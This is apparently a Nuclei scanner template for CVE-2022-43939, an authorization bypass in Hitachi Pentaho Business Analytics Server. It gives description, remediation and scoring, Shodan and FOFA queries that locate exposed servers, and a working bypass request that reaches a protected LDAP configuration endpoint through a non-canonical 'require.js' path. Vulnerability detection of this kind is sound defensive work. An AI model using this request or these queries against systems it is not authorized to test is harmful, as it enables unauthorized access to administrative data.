id: CVE-2022-43939

info:
  name: Hitachi Pentaho Business Analytics Server - Authorization Bypass
  author: daffainfo
  severity: high
  description: |
    Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x, make authorization decisions on non-canonical URL paths, so the security restrictions on protected endpoints can be circumvented by requesting an equivalent non-canonical form of the path.
  impact: |
    Unauthenticated attackers can reach protected administrative API endpoints by requesting them through non-canonical URL paths, potentially gaining unauthorized access to sensitive analytics data and configuration.
  remediation: |
    Upgrade to Hitachi Vantara Pentaho Business Analytics Server 9.4.0.1 or 9.3.0.2 (or later), which authorize requests on the canonical URL path.
  reference:
    - https://support.pentaho.com/hc/en-us/articles/14455394120333--Resolved-Pentaho-BA-Server-Use-of-Non-Canonical-URL-Paths-for-Authorization-Decisions-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43939-
    - https://nvd.nist.gov/vuln/detail/CVE-2022-43939
    - https://research.aurainfosec.io/pentest/pentah0wnage/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
    cvss-score: 8.6
    cve-id: CVE-2022-43939
    epss-score: 0.93254
    epss-percentile: 0.99813
    cwe-id: CWE-647
    cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: hitachi
    product: vantara_pentaho_business_analytics_server
    shodan-query: http.favicon.hash:1749354953
    fofa-query: icon_hash=1749354953
  tags: cve,cve2022,pentaho,hitachi,auth-bypass,vkev,kev,vuln

flow: http(1) && http(2)

http:
  # Step 1: confirm the target is a Pentaho User Console before probing.
  - method: GET
    path:
      - '{{BaseURL}}/pentaho/Login'

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Pentaho User Console - Login")'
        condition: and
        internal: true

  # Step 2: request a protected LDAP configuration endpoint through a
  # non-canonical path (a trailing require.js segment). An unauthenticated
  # 200 with a JSON body and a /pentaho session cookie is the bypass signal;
  # a patched server redirects to the login page instead.
  - method: GET
    path:
      - "{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Path=/pentaho'
          - 'application/json'
        condition: and

      - type: word
        part: body
        words:
          - '{}'

      - type: status
        status:
          - 200
# digest: 490a0046304402200e2126fb0932ef38f8e83afe2c050edac7f43cd5833cb6ac2f139a40dd0e28f30220280734a5aabdea4f5aec3e9cd8586fb4a4f94605c452c436e16d783ba51c9353:922c64590222798bb761d5b6d8e72950